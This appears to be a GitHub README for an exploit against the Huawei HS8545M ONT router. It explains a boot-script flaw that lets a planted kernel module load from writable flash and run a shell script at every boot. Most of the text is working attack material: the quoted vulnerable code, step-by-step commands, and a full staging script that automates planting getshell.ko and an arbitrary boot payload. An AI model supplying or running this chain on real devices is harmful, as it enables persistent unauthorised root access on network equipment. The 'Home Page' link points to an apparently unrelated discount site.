csnol / Exploit-HS8545M-ONT

Exploit for the Huawei HS8545M ONT. Only firmware release r019 is supported out of the box; for r018 or r017 you have to compile the kernel module getshell.ko yourself against that release's kernel.

Home Page:https://vps.gitbook.io/discount/


Note

This may brick your ONT device. Use it at your own risk, and keep a way to recover the flash (e.g. a backup of /mnt/jffs2) before you start.

Usage

Step 1: find a way to load a user-supplied .ko module

The startup script /etc/rc.d/rc.start/1.sdk_init.sh can be abused to load a kernel module of our choosing from the writable JFFS2 partition. Our module, getshell.ko, then runs the shell script /mnt/jffs2/hw/getshell.sh every time the system boots.

The logic flaw is in lines 200-206 of 1.sdk_init.sh:

```sh
# load hisi modules
if [ -f /mnt/jffs2/TranStar/hi_sysctl.ko ]; then
	  cd /mnt/jffs2/TranStar/
	  echo "Loading the Temp HISI SD511X modules: "
else
	  cd /lib/modules/hisi_sdk
	  echo "Loading the HISI SD511X modules: "
fi
```

If /mnt/jffs2/TranStar/hi_sysctl.ko exists, the script executes cd /mnt/jffs2/TranStar/, so from that point on the working directory is /mnt/jffs2/TranStar/ and the later insmod calls pick up modules from there. /mnt/jffs2 is writable, so we control every module that gets loaded. Mirror the stock modules into that directory so the boot sequence still works:

```sh
mkdir -p /mnt/jffs2/TranStar/
cp -rf /lib/modules/hisi_sdk/* /mnt/jffs2/TranStar/
```

Step 2: make sure the module-load lines are reached

To make the script execute lines 261-262 (the lines that insmod the GPON/EPON module), set the following entry in /mnt/jffs2/hw_boardinfo:

```
obj.id = "0x00000001" ; obj.value = "4";
```

Step 3: upload getshell.ko

getshell.ko (compiled by 0neday) only works on r019. Copy it over the name of the module that lines 261-262 will insmod, as follows (the pairing is deliberate: on a GPON unit it replaces hi_epon.ko, on an EPON unit hi_gpon.ko), then reboot:

```sh
# just for gpon
cp getshell.ko /mnt/jffs2/TranStar/hi_epon.ko

# or for epon
cp getshell.ko /mnt/jffs2/TranStar/hi_gpon.ko
```
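The three steps above as one staging script. This is an added example, not code from the csnol repo: it runs the same mkdir/cp/hw_boardinfo/getshell.ko sequence, but first checks that the target's 1.sdk_init.sh actually contains the `cd /mnt/jffs2/TranStar/` branch before it writes anything to flash, and it takes a ROOT prefix so you can rehearse against an extracted firmware tree before running it on the ONT itself. Assumed, not stated on the page: hw_boardinfo entries are one-per-line in the form `obj.id = "..." ; obj.value = "...";`, and the payload script you supply is what getshell.ko will execute as /mnt/jffs2/hw/getshell.sh.

```shell
#!/bin/sh
# stage_getshell.sh - added example, not part of the csnol/Exploit-HS8545M-ONT repo.
# Stages the 1.sdk_init.sh module-load hijack on an HS8545M root filesystem.
#
# Assumptions (verify on your unit):
#   - hw_boardinfo lines look like:  obj.id = "0x00000001" ; obj.value = "N";
#   - lines 261-262 of 1.sdk_init.sh insmod hi_gpon.ko / hi_epon.ko from the cwd
#   - getshell.ko was built for the running firmware (the README only ships r019)

set -u

# stage_getshell ROOT MODE GETSHELL_KO PAYLOAD_SH
#   ROOT     "/" on the ONT, or a directory holding an extracted firmware tree
#   MODE     "gpon" or "epon", the link type of the ONT
#   Returns 0 when everything is staged, non-zero if a precondition failed.
stage_getshell() {
    root=$1; mode=$2; ko=$3; payload=$4
    init="$root/etc/rc.d/rc.start/1.sdk_init.sh"
    sdk="$root/lib/modules/hisi_sdk"
    tmp="$root/mnt/jffs2/TranStar"
    binfo="$root/mnt/jffs2/hw_boardinfo"

    # 1. Refuse to touch flash unless the vulnerable branch is really there.
    grep -q 'cd /mnt/jffs2/TranStar/' "$init" 2>/dev/null || {
        echo "no TranStar branch in $init; different firmware, aborting" >&2; return 1; }
    [ -f "$ko" ] && [ -f "$payload" ] || { echo "getshell.ko or payload missing" >&2; return 1; }

    # 2. Mirror the stock hisi_sdk modules into the writable TranStar dir.
    #    hi_sysctl.ko must end up there, or the script stays in /lib/modules/hisi_sdk.
    mkdir -p "$tmp" "$root/mnt/jffs2/hw" || return 1
    cp -rf "$sdk"/* "$tmp"/ || return 1
    [ -f "$tmp/hi_sysctl.ko" ] || { echo "hi_sysctl.ko not copied; cd will not trigger" >&2; return 1; }

    # 3. obj.id 0x00000001 -> value 4 so lines 261-262 are reached (per the README).
    #    Rewrite via a temp file rather than sed -i, which busybox and GNU treat differently.
    if grep -q 'obj.id = "0x00000001"' "$binfo" 2>/dev/null; then
        sed 's/^\(obj.id = "0x00000001" ; obj.value = \)"[^"]*";/\1"4";/' "$binfo" > "$binfo.tmp" \
            && mv "$binfo.tmp" "$binfo" || return 1
    else
        echo 'obj.id = "0x00000001" ; obj.value = "4";' >> "$binfo" || return 1
    fi

    # 4. Drop getshell.ko under the module name the README pairs with this link type.
    case $mode in
        gpon) cp -f "$ko" "$tmp/hi_epon.ko" ;;
        epon) cp -f "$ko" "$tmp/hi_gpon.ko" ;;
        *) echo "mode must be gpon or epon" >&2; return 1 ;;
    esac || return 1

    # 5. getshell.ko runs /mnt/jffs2/hw/getshell.sh at boot; install the payload there.
    cp -f "$payload" "$root/mnt/jffs2/hw/getshell.sh" \
        && chmod 755 "$root/mnt/jffs2/hw/getshell.sh"
}

# On the ONT:  stage_getshell / gpon ./getshell.ko ./getshell.sh && reboot
```

Run it once against a copy of the firmware tree (`stage_getshell ./fw gpon ...`) and diff the result before doing it on the live unit; the grep in step 1 is what stops you from writing to flash on an r018/r017 image whose sdk_init.sh does not have the TranStar branch.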

License

GPLv3.0


